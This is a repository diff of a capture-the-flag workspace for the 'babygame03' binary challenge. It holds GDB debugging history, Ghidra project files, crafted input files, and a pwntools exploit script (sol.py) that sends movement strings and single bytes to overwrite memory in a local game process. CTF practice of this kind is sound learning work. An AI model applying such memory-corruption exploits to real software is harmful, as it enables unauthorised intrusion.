babygame03_temp

babygame03/.gdb_history

@@ -0,0 +1,256 @@
+c
+c
+x/40x 0xffffbd00
+c
+c
+run
+c
+run
+c
+x/40x 0xffffbd00
+c
+run
+exit
+b *move_player
+run < out
+c
+c
+x/40x 0xffffbd00
+c
+x/40x 0xffffbd00
+disassemble main
+b *main+39
+run < out
+stack 
+stack 20
+clear *main+3
+clear *main+39
+b *main+93
+run < out
+stack 20
+stack 20
+stack 40
+stack 60
+stack 80
+stack 100
+stack 200
+stack 100
+stack 110
+stack 400
+stack 1000
+stack 600
+stack 700
+stack 680
+stack 690
+stack 685
+stack 686
+stack 687
+stack 688
+stack 689
+stack 688
+x/x 0xffffdb0c
+x/x 0xffffbd0c
+continue
+c
+run < out
+x/x 0xffffbd0c
+c
+continue
+run < out
+c
+x/x 0xffffbd0c
+c
+x/x 0xffffbd0c
+disassemble main
+b *main+372
+x/x 0xffffbd0c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+c
+b
+clear 5
+exit
+disassemble main
+x/x 0xffffbd0c
+b *move_player
+run < out
+x/x 0xffffbd0c
+x/40x 0xffffbd00
+x/40x 0xffffcd00
+x/40x 0xffffbd00
+x/40x 0xffffbf00
+x/40x 0xffffbd00
+x/40x 0xffffbd00
+x/40x 0xffffbd00
+x/40x 0xffffc000
+x/40x 0xffffc400
+x/40x 0xffffc600
+x/40x 0xffffc800
+x/40x 0xffffc700
+x/40x 0xffffc780
+x/40x 0xffffbd00
+x/40x 0xffffc780
+x/x 0xffffc7ac
+x/x 0xffffbd0c
+x/40x 0xffffbd00
+exit
+b *move_player
+x/x 0xffffbd0c
+x/x 0xffffc7ac
+run < out2
+x/x 0xffffc7ac
+x/x 0xffffbd0c
+c
+c
+x/x 0xffffc7ac
+c
+x/x 0xffffc7ac
+run < out2
+x/x 0xffffc7ac
+x/x 0xffffbd0c
+c
+x/x 0xffffc7ac
+c
+x/x 0xffffc7ac
+x/40x 0xffffbd00
+exit
+disassemble main
+disassemble move_player
+b *move_player+8
+run 
+stack 20
+stack 30
+x/40x 0xffa890
+x/40x 0xffffa890
+exit
+b *move_player+8
+run
+stack 20
+c
+c
+stack 20
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+x/40x 0xffffa890
+c
+exit
+exit
+disassemble main 
+q
+disassemble main 
+disassemble move_
+disassemble move_player
+b *move_player+357
+run < out
+c
+run < out
+c
+exit
+b *move_player+357
+run < out3
+c
+stack 20
+x/40x 0xffffbce0
+x/40x 0xffffbcf0
+x/40x 0xffffbe00
+x/40x 0xffffbd0
+x/40x 0xffffbd00
+x/40x 0xffffbd2f
+x/40x 0xffffbd00
+x/40x 0xffffbc00
+x/40x 0xffffbcd0
+stack 30
+stack 800
+stack 700
+stack 720
+stack 700
+stack 710
+stack 720
+disassemble main
+stack 40
+stack -1 40
+stack 40 -1
+stack 40 -10
+stack 40
+stack 40
+x/40x 0xffffbcd0
+x/40x 0xffffbce0
+c
+c
+c
+c
+c
+run < out3
+c
+run 
+c
+c
+c
+c
+c
+c
+c
+exit
+disassemble move_player
+b *move_player+357
+run < out2
+c
+stack 40
+x/40x 0xffffbce0
+c
+x/40x 0xffffbce0
+run < out2
+c
+x/40x 0xffffbce0
+c
+x/40x 0xffffbce0
+c
+x/40x 0xffffbce0
+c
+x/40x 0xffffbce0
+run < out2
+c
+x/40x 0xffffbce0
+c
+c
+exit
+disassemble main
+b *main+378
+run < args
+run < args
+run < args
+tic
+exit

babygame03/args

@@ -0,0 +1,2 @@
+aaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpwsaaaaaaaawwwwswws
+

babygame03/babygame03.lock

@@ -0,0 +1,9 @@
+#Ghidra Lock File
+#Mon Nov 18 09:14:36 CET 2024
+<META>\ Supports\ File\ Channel\ Locking=Channel Lock
+Hostname=theon-1
+OS\ Architecture=amd64
+OS\ Name=Linux
+OS\ Version=6.11.6-arch1-1
+Timestamp=11/18/24, 9\:14\u202FAM
+Username=maxime

babygame03/babygame03.rep/idata/00/00000001.prp

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b32f38007603038077" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="game" />
+    </BASIC_INFO>
+</FILE_INFO>

babygame03/babygame03.rep/idata/~index.bak

@@ -0,0 +1,7 @@
+VERSION=1
+/
+  00000001:game:ac10290b32f38007603038077
+/New Traces
+  00000002:Emulate game:ac10290839926930849280384
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/idata/~index.dat

@@ -0,0 +1,5 @@
+VERSION=1
+/
+  00000001:game:ac10290b32f38007603038077
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/idata/~journal.bak

@@ -0,0 +1,2 @@
+IDEL:/New Traces/Emulate game
+FDEL:/New Traces

babygame03/babygame03.rep/project.prp

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="OWNER" TYPE="string" VALUE="maxime" />
+    </BASIC_INFO>
+</FILE_INFO>

babygame03/babygame03.rep/projectState

@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<PROJECT>
+    <PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
+        <SAVE_STATE>
+            <ARRAY NAME="EXPANDED_PATHS" TYPE="string">
+                <A VALUE="babygame03:" />
+            </ARRAY>
+            <STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
+        </SAVE_STATE>
+    </PROJECT_DATA_XML_NAME>
+    <TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
+        <WORKSPACE NAME="Workspace" ACTIVE="true" />
+    </TOOL_MANAGER>
+</PROJECT>
+

babygame03/babygame03.rep/user/00/00000001.prp

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b31146457713312322" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="udf_ac10290b32f38007603038077" />
+    </BASIC_INFO>
+</FILE_INFO>

babygame03/babygame03.rep/user/~index.bak

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:1
+MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/user/~index.dat

@@ -0,0 +1,5 @@
+VERSION=1
+/
+  00000001:udf_ac10290b32f38007603038077:ac10290b31146457713312322
+NEXT-ID:2
+MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/user/~journal.bak

@@ -0,0 +1,2 @@
+IADD:00000001:/udf_ac10290b32f38007603038077
+IDSET:/udf_ac10290b32f38007603038077:ac10290b31146457713312322

babygame03/babygame03.rep/versioned/~index.bak

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/versioned/~index.dat

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/flag.txt

@@ -0,0 +1 @@
+flag{test}

babygame03/mkstr.py

@@ -0,0 +1,10 @@
+#!/usr/bin/env python3
+from pwn import *
+
+a = 'aaaa'+'a'*4+'wwwws'
+b = 'a'*47+'lp'+'ws'
+
+s = a+'p' +a+'p' +a+'p' +a +b +a +'wws\n'
+
+print(s)
+

babygame03/out

@@ -0,0 +1 @@
+aaaaaaaawwwws

babygame03/out2

@@ -0,0 +1 @@
+aaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpws

babygame03/out3

@@ -0,0 +1 @@
+aaaaaaaawwwws

babygame03/sol.py

@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+from pwn import *
+
+s = b'aaaa'+b'a'*4+b'wwwws'
+
+conn = process(["./game"])
+for i in range(3):
+    conn.sendline(s)
+    conn.sendline(b'p')
+conn.sendline(s)
+conn.sendline(b'a'*47+b'l\x70'+b'ws')
+conn.sendline(s)
+conn.sendline(b'wws')
+conn.sendline(b'a'*47+b'l\xfe'+b'w')
+conn.interactive()
+